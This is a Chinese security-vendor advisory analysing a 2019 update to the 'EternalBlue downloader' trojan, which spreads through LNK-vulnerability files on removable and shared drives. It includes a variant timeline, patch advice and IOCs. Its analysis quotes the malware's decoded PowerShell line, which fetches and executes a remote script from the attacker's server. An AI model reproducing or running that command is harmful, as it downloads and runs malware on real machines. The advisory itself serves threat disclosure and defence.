产品中心
产品中心
基础安全
T-Sec 主机安全
容器安全服务 TCSS
T-Sec DDos防护
T-Sec Web应用防火墙
T-Sec 云防火墙
T-Sec 安全运营中心
T-Sec iOA零信任安全管理系统
业务安全
T-Sec 天御 验证码
T-Sec 天御 文本内容安全
T-Sec 天御 视频内容安全
T-Sec 全栈式风控引擎
T-Sec 手游安全
T-Sec 小程序安全
T-Sec 应用合规平台
数据安全
T-Sec 堡垒机
T-Sec 数据安全审计
T-Sec 云访问安全代理
T-Sec 凭据管理系统
T-Sec 密钥管理系统
T-Sec 云加密机
T-Sec 数据安全治理中心
安全服务
T-Sec 安全专家服务
等保合规服务
T-Sec 安全托管服务
渗透测试服务
应急响应服务
重要时期安全保障服务
安全攻防对抗服务
了解全部安全产品→解决方案
解决方案
通用解决方案
等保合规安全解决方案
直播安全解决方案
数据安全解决方案
运维解决方案
品牌保护解决方案
高防云主机安全
腾讯安心平台解决方案
行业解决方案
游戏行业安全方案
电商行业安全方案
零售行业安全方案
安全专项解决方案
勒索病毒专项解决方案
更多
更多
关于我们
腾讯安全介绍
荣誉认证
帮助中心
帮助文档
考试认证
在线课堂
考试入口
证书查询
开启你的安全之旅
联系我们
寻求市场合作
友情链接
腾讯云
未登录- 登录可以享受
- 精准服务推荐
- 线上快捷下单
- 海量资源流量
- 立即登录
正文永恒之蓝下载器木马再次更新,新增移动盘及网络共享盘传播
2019-07-30 03:41:43
概述
腾讯安全御见威胁情报中心检测到“永恒之蓝下载器”木马于2019年7月19日再次更新,本次更新新增了“震网三代”漏洞CVE-2017-8464利用。
更新后的木马会在用户所有的可移动盘以及网络共享盘上创建大量带有漏洞的Lnk文件,导致其他使用该移动盘或共享盘的机器可能感染木马,容易成企业内部的大面积中招。
更新后“永恒之蓝下载器”木马主要特点:
1、保留了MS17-010永恒之蓝漏洞攻击、SMB爆破攻击,并在在攻击成功的目标机器上植入旧的攻击模块ipc.jsp。
2、新增了MsSQL爆破(PE攻击方式曾使用过,无文件攻击首次发现使用)、Lnk漏洞CVE-2017-8464利用攻击,在攻击成功后的机器上安装计划任务执行Powershell后门usp.jsp,通过计划任务下载新的攻击模块if.bin。
3、安装计划任务后门时采用随机名和随机位置,对老的计划任务Rtsa进行清除。
变种木马攻击流程图如下,其中橙色为新增攻击。
详细分析
本次变种利用Lnk漏洞攻击流程如下:
Usb.jsp通过多层下载得到if.bin,该文件为Powershell脚本,会被安装为计划任务持久化。
if.bin首先检测可移动盘和网络共享盘
然后在目标盘根目录创建Lnk文件和二进制木马文件进行感染
创建的Lnk文件名以大写字母D~K开头,如Dblue3到Kblue6,感染效果如下
将特定结构的数据写入Lnk文件,使得在存在漏洞的机器上,只要打开该目录“看一眼”就会触发漏洞执行blue3.bin/blue6.bin。
blue3.bin/blue6.bin运行后,在其他机器上执行脚本进行感染
脚本解码后为下载执行最初的Powershell代码usb.jsp:
$lf=$env:tmp+'\kdls92jsjqs0.usb';if(!(Test-Path$lf)){IEX(New-ObjectSystem.Net.WebClient).DownloadString('http://t.zer2.com/usb.jsp');new-item $lf-type file}
“永恒之蓝下载器”木马历史变种版本回顾
|
2019年7月19日 |
新增CVE-2017-8464 Lnk漏洞利用攻击,感染启动盘和网络共享盘。 |
|
2019年4月3日 |
开创无文件挖矿新模式:挖矿脚本由PowerShell下载在内存中执行。 |
|
2019年3月28日 |
更新无文件攻击模块,更后新的攻击方式为:永恒之蓝漏洞攻击、弱口令爆破+WMIC、 Pass the hash+ SMBClient/SMBExec,并通过Payload安装计划任务将木马具有的多个恶意程序进行下载。 |
|
2019年3月14日 |
通过后门更新增肥木马大小、生成随机文件MD5逃避查杀,将生成的大文件木马拷贝到多个系统目录并通过注册表启动项、开始菜单启动项、计划任务进自启动。 |
|
2019年3月8日 |
通过已感染机器后门更新PE文件横向传播模块ii.exe,采用无文件攻击技术。该团伙使用的Powershell攻击代码与2018年9月发现的Mykings僵尸网络变种攻击代码有诸多相似之处。 |
|
2019年3月6日 |
通过已感染机器后门更新Powershell脚本横向传播模块ipc。 |
|
2019年2月25日 |
在2月23日基础上继续更新,更新MsSQL爆破攻击时密码字典,添加样本文件签名。至此攻击方法集成永恒之蓝漏洞攻击、SMB爆破攻击、MsSQL爆破攻击,同时使用黑客工具mimiktaz、psexec进行辅助攻击。 |
|
2019年2月23日 |
攻击方法再次更新,新增MsSQL爆破攻击。 |
|
2019年2月20日 |
更新矿机组件,下载释放XMRig矿机,以独立进程启动挖矿。 |
|
2019年2月10日 |
将攻击模块打包方式改为Pyinstaller. |
|
2019年1月25日 |
木马在1月24日的基础上再次更新,将攻击组件安装为计划任务,在攻击时新增利用mimikatz搜集登录密码,SMB弱口令爆破攻击,同时安装Powershell计划任务和hta计划任务。 |
|
2019年1月24日 |
木马将挖矿组件、升级后门组件分别安装为计划任务,并同时安装Powershell后门。 |
|
2019年1月9日 |
检测到挖矿组件xmrig-32.mlz/xmrig-64.mlz下载。 |
|
2018年12月19日 |
下载之后的木马新增Powershell后门安装。 |
|
2018年12月14日 |
利用“驱动人生”系列软件升级通道下载,利用“永恒之蓝”漏洞攻击传播。 |
安全建议
1、MS010-17 “永恒之蓝”漏洞
服务器暂时关闭不必要的端口(如135、139、445),方法可参考:https://guanjia.qq.com/web_clinic/s8/585.html
下载并更新Windows系统补丁,及时修复永恒之蓝系列漏洞
XP、WindowsServer2003、win8等系统访问:http://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
Win7、win8.1、WindowsServer 2008、Windows 10,WindowsServer2016等系统访问:https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
2、CVE-2017-8464 LNK 远程执行代码漏洞
参考微软官方公告安装补丁:
https://portal.msrc.microsoft.com/zh-cn/security-guidance/advisory/CVE-2017-8464
3、服务器使用高强度密码,切勿使用弱口令,防止黑客暴力破解;
4、使用杀毒软件拦截可能的病毒攻击;
5、推荐企业用户部署腾讯御界高级威胁检测系统防御可能的黑客攻击。御界高级威胁检测系统,是基于腾讯安全反病毒实验室的安全能力、依托腾讯在云和端的海量数据,研发出的独特威胁情报和恶意检测模型系统。
IOCs
Md5:
FFEB6DC402F37542889AE2D17B0EDDF2
F1BF55BA24D1A05E80A7CA1D6774AB3D
9ABFFFAF7A4877C9187C3F8A6E59B065
URL:
http[:]//t.zer2.com/usb.jsp
http[:]//t.zer2.com/v.js
http[:]//t.awcna.com/v.js
http[:]//t.amxny.com/v.js
http[:]//t.zer2.com/v.jsp
http[:]//down.ackng.com/if.bin
http[:]//down.ackng.com/m6.bin
http[:]//down.ackng.com/m3.bin
参考链接:
https://www.freebuf.com/column/200241.html
在线咨询